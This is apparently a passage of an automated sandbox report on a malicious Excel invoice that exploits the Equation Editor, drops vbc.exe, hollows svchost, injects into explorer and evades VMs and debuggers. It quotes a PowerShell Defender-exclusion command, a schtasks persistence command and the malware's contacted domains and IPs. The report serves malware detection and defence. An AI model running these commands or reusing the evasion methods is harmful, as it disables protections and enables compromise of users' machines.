Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FA50 NtEnumerateValueKey, 12_2_00A2FA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FBE8 NtQueryVirtualMemory, 12_2_00A2FBE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FC90 NtUnmapViewOfSection, 12_2_00A2FC90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FC30 NtOpenProcess, 12_2_00A2FC30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A30C40 NtGetContextThread, 12_2_00A30C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FC48 NtSetInformationFile, 12_2_00A2FC48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A31D80 NtSuspendThread, 12_2_00A31D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FD5C NtEnumerateKey, 12_2_00A2FD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FEA0 NtReadVirtualMemory, 12_2_00A2FEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FE24 NtWriteVirtualMemory, 12_2_00A2FE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FFFC NtCreateProcessEx, 12_2_00A2FFFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FF34 NtQueueApcThread, 12_2_00A2FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_000985E0 NtCreateFile, 12_2_000985E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00098690 NtReadFile, 12_2_00098690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00098710 NtClose, 12_2_00098710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_000987C0 NtAllocateVirtualMemory, 12_2_000987C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_000987C2 NtAllocateVirtualMemory, 12_2_000987C2
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: nLOlOTZpUHFzC.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PROFORMA INVOICE.xlsx
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@12/26@7/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: PROFORMA INVOICE.xlsx ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD029.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: vbc.exe String found in binary or memory: /SecurityExcepti;component/views/addbook.xaml
Source: vbc.exe String found in binary or memory: views/addcustomer.baml
Source: vbc.exe String found in binary or memory: views/addbook.baml
Source: vbc.exe String found in binary or memory: /SecurityExcepti;component/views/addcustomer.xaml
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.462674322.0000000000910000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.461677984.00000000007B0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.495648156.0000000000DC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, svchost.exe, 0000000C.00000003.495116287.00000000002A0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.495983916.00000000004E0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.661157510.0000000000BA0000.00000040.00000001.sdmp
Source: Binary string: svchost.pdb source: vbc.exe, 00000009.00000002.495309971.00000000006D9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.495142826.0000000000030000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: vbc[1].exe.2.dr, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.2.dr, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: nLOlOTZpUHFzC.exe.4.dr, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.bb0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.bb0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.8.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.6.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.4.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.10.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.vbc.exe.bb0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00BB92F5 push ds; ret 4_2_00BB9340
Source: C:\Users\Public\vbc.exe Code function: 4_2_00BB9361 push ds; retf 4_2_00BB9364
Source: C:\Users\Public\vbc.exe Code function: 4_2_00BB9347 push ds; ret 4_2_00BB934C
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041B832 push eax; ret 9_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041B83B push eax; ret 9_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041B89C push eax; ret 9_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 9_2_00406907 push 00000060h; retf 9_2_0040691C
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041A11B push ecx; ret 9_2_0041A11C
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041A3BA pushfd ; ret 9_2_0041A3BB
Source: C:\Users\Public\vbc.exe Code function: 9_2_004154EE pushad ; retf 9_2_004154F0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00419E43 push 0000007Eh; iretd 9_2_00419E45
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040EFC6 push cs; ret 9_2_0040EFCC
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041B7E5 push eax; ret 9_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 9_2_00BB92F5 push ds; ret 9_2_00BB9340
Source: C:\Users\Public\vbc.exe Code function: 9_2_00BB9361 push ds; retf 9_2_00BB9364
Source: C:\Users\Public\vbc.exe Code function: 9_2_00BB9347 push ds; ret 9_2_00BB934C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3DFA1 push ecx; ret 12_2_00A3DFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009A11B push ecx; ret 12_2_0009A11C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009A3BA pushfd ; ret 12_2_0009A3BB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_000954EE pushad ; retf 12_2_000954F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009B7E5 push eax; ret 12_2_0009B838
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009B83B push eax; ret 12_2_0009B8A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009B832 push eax; ret 12_2_0009B838
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009B89C push eax; ret 12_2_0009B8A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00086907 push 00000060h; retf 12_2_0008691C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00099E43 push 0000007Eh; iretd 12_2_00099E45
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0008EFC6 push cs; ret 12_2_0008EFCC
Source: initial sample Static PE information: section name: .text entropy: 7.85477133341

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (49 identical entries)
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 4.2.vbc.exe.228f148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.22fc90c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2224, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2788 Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 760 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 760 Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 760 Thread sleep time: -450000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2520 Thread sleep count: 4470 > 30
Source: C:\Users\Public\vbc.exe TID: 2520 Thread sleep count: 348 > 30
Source: C:\Users\Public\vbc.exe TID: 1940 Thread sleep time: -37113s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 772 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 1496 Thread sleep time: -34000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 240000
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 4470
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 9_2_004088D0 rdtsc 9_2_004088D0
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 240000
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 37113
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.484397253.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000A.00000000.479423416.00000000083DA000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0s
Source: explorer.exe, 0000000A.00000000.484397253.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.469562916.000000000577D000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 0000000A.00000000.506224485.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.479423416.00000000083DA000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000^
Source: explorer.exe, 0000000A.00000000.481002565.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 0000000A.00000000.470628485.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.484397253.000000000457A000.00000004.00000001.sdmp Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C626F8 mov eax, dword ptr fs:[00000030h] 9_2_00C626F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A426F8 mov eax, dword ptr fs:[00000030h] 12_2_00A426F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 9_2_004088D0 rdtsc 9_2_004088D0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 9_2_00409B40 LdrLoadDll, 9_2_00409B40
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.digipoint-entertainment.com
Source: C:\Windows\explorer.exe Domain query: www.hacticum.com
Source: C:\Windows\explorer.exe Network Connect: 108.167.189.66 80
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe Domain query: www.trashwasher.com
Source: C:\Windows\explorer.exe Domain query: www.noyoucantridemyonewheel.com
Source: C:\Windows\explorer.exe Domain query: www.franquiciasexclusivas.tienda
Source: C:\Windows\explorer.exe Network Connect: 151.106.119.46 80
Source: C:\Windows\explorer.exe Domain query: www.deboraverdian.com
Source: C:\Windows\explorer.exe Network Connect: 151.101.66.159 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write (2 entries)
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Adds a directory exclusion to Windows Defender
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe"
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: A00000
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: explorer.exe, 0000000A.00000000.499985867.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.474384817.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.466242782.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.481212963.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 0000000A.00000000.499985867.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.474384817.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.466242782.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.481212963.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 0000000A.00000000.499985867.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.474384817.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.466242782.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.481212963.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<
